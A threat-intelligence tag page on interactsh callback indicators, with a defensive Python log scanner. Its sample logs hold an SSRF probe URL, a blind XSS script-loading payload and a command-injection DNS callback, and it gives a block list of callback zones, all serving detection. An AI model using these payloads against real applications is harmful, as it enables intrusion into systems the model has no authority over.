#interactsh

ProjectDiscovery's OAST canary (out-of-band application security testing) - flagged when attackers use it for blind XSS, SSRF or RCE confirmation


IOCs by window

Today: 0 IOCs tagged #interactsh
Week: 0 IOCs tagged #interactsh
Month: 0 IOCs tagged #interactsh
Year: 2,371 IOCs tagged #interactsh

Counts as of 2026-04-29. Regenerated daily.

About #interactsh

  • Type: OAST (Out-of-band Application Security Testing) canary tool maintained by ProjectDiscovery. Issues unique callback hostnames that record any DNS, HTTP or SMTP interaction with them, which is how a tester confirms a blind vulnerability (blind XSS, SSRF, out-of-band RCE) when the target returns nothing in-band.
  • Why IOCs appear: researchers tag URLs and IPs seen calling back to interactsh as #interactsh when they observe attackers using the canary in real-world exploitation, typically as confirmation infrastructure paired with payloads against vulnerable web apps.
  • Detection signals: callback hostnames are subdomains of oast.live, oast.fun, oast.me, oast.online, oast.pro or oast.site, so match on the zone suffix rather than on the full per-session hostname. Self-hosted instances use whatever domain the operator registered and are not caught by this list. Defenders with no legitimate use for the public zones can block them in egress filters and at the DNS resolver; blocking resolution also stops the DNS-only callbacks that never pass through an HTTP proxy.
  • References: projectdiscovery/interactsh on GitHub.
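The detection signals above reduce to a suffix match on the six public zones, applied to every place a callback hostname can show up: a percent-encoded URL in a query string or POST body (SSRF probes), a script source in a submitted form (blind XSS) or a bare name in a DNS resolver log (out-of-band RCE). The following script is an added example for this page, not ProjectDiscovery's or TweetFeed's code. The zone list is the one given above; the log lines are constructed samples with invented subdomains, and the extra zone cb.example.net used to show the self-hosted case is a hypothetical.

```python
"""Flag log lines that reference interactsh callback hosts.

Added example for this page (not ProjectDiscovery's or TweetFeed's code).
The six zones are the ones the page lists; the log lines below are constructed
sample data and every interactsh subdomain in them is invented.
"""
import re
from urllib.parse import unquote

# Canonical ProjectDiscovery interactsh zones listed on this page.
INTERACTSH_ZONES = ("oast.live", "oast.fun", "oast.me", "oast.online", "oast.pro", "oast.site")

# Rough hostname matcher: dot-separated labels ending in an alphabetic TLD.
# It over-matches on purpose (index.html matches too); is_interactsh_host filters.
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)


def is_interactsh_host(host, zones=INTERACTSH_ZONES):
    """True if host is one of the zones or a subdomain of one.

    Matching on a label boundary ("." + zone) avoids false positives such as
    notoast.pro. Pass extra zones for self-hosted servers you have learned about
    from the IOC feed or your own observations (assumption: you know them).
    """
    host = host.lower().rstrip(".")
    return any(host == z or host.endswith("." + z) for z in zones)


def find_interactsh_hosts(line, zones=INTERACTSH_ZONES):
    """Return the sorted interactsh hostnames referenced anywhere in one log line.

    Callback URLs usually arrive percent-encoded inside a query string or form
    body, so the line is decoded (twice, to cover double encoding) before the
    hostnames are extracted.
    """
    decoded = line
    for _ in range(2):
        decoded = unquote(decoded)
    return sorted({h.lower() for h in HOST_RE.findall(decoded) if is_interactsh_host(h, zones)})


def scan_logs(lines, zones=INTERACTSH_ZONES):
    """Return [(line_index, [hosts...]), ...] for every line that contains a hit."""
    hits = []
    for i, line in enumerate(lines):
        hosts = find_interactsh_hosts(line, zones)
        if hosts:
            hits.append((i, hosts))
    return hits


# Constructed sample log lines (not real traffic); subdomains are invented.
SAMPLE_LOGS = [
    # web access log: SSRF probe carrying a percent-encoded callback URL
    '203.0.113.7 - - [29/Apr/2026:10:01:02 +0000] "GET /fetch?url=http%3A%2F%2Fc5k2x9abc.oast.fun%2Fprobe HTTP/1.1" 200 512',
    # web access log: blind XSS payload logged from a submitted form field
    '203.0.113.7 - - [29/Apr/2026:10:01:05 +0000] "POST /feedback HTTP/1.1" 200 88 "-" "<script src=//xyz.oast.site></script>"',
    # resolver query log: DNS-only callback from a command-injection probe
    "Apr 29 10:01:07 resolver named[123]: client 10.0.0.5#5353: query: cmdinj.ab12cd.oast.pro IN A",
    # benign request, must not match
    '198.51.100.4 - - [29/Apr/2026:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
    # lookalike name, must not match (no label boundary before oast.pro)
    "Apr 29 10:02:11 resolver named[123]: query: notoast.pro IN A",
]

if __name__ == "__main__":
    for i, hosts in scan_logs(SAMPLE_LOGS):
        print(f"line {i}: interactsh callback host(s): {', '.join(hosts)}")
        print(f"  {SAMPLE_LOGS[i]}")
```

Run as-is it reports lines 0, 1 and 2 and ignores the benign request and the notoast.pro lookalike. Feed real access or resolver logs through scan_logs in place of SAMPLE_LOGS, and extend the zones argument with any self-hosted domains that appear in the IOC feed, since those are invisible to the public-zone list alone.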

Recent IOCs tagged #interactsh

No IOCs tagged #interactsh in the past 30 days. Year aggregate: 2,371. For longer-window data, query api.tweetfeed.live/v1/year/interactsh.

Related tags

Tags that frequently co-occur with #interactsh.


Frequently asked questions

What is Interactsh?

Interactsh is an OAST (out-of-band application security testing) canary tool maintained by ProjectDiscovery. It issues unique callback URLs that record DNS, HTTP and SMTP requests directed at them, letting offensive security testers confirm blind vulnerabilities like blind XSS, SSRF and out-of-band RCE. The tool is open-source and free to self-host.

Why are interactsh URLs in a malicious-IOC feed?

Interactsh is dual-use. Researchers tag a URL as #interactsh when they observe an attacker - or commodity exploit tooling - using interactsh callbacks against a real production target. The URL is not malicious in itself, but its presence in a request log indicates active exploitation attempts and is useful as a detection signal.

How is this list updated?

Every 15 minutes. The TweetFeed pipeline scrapes RSS feeds from public Twitter/X security researcher accounts and lists, extracts IOCs, tags them with the relevant malware family, threat actor or tool (here #interactsh), and republishes the result in CSV, JSON and RSS. Interactsh-tagged IOCs are surfaced on this page within the next 15-minute tick. The page itself is regenerated daily by a GitHub Action.

What is the license? Can I use this commercially?

All TweetFeed IOC data, including this Interactsh subset, is released under CC0 1.0 Universal (Public Domain Dedication). No attribution required, no warranty. Commercial use is allowed. The TweetFeed website code and branding are not covered by CC0.

License

Interactsh IOC data: CC0 1.0 Public Domain. No attribution required, no warranty. Source code for the pipeline: github.com/0xDanielLopez/TweetFeed (MIT).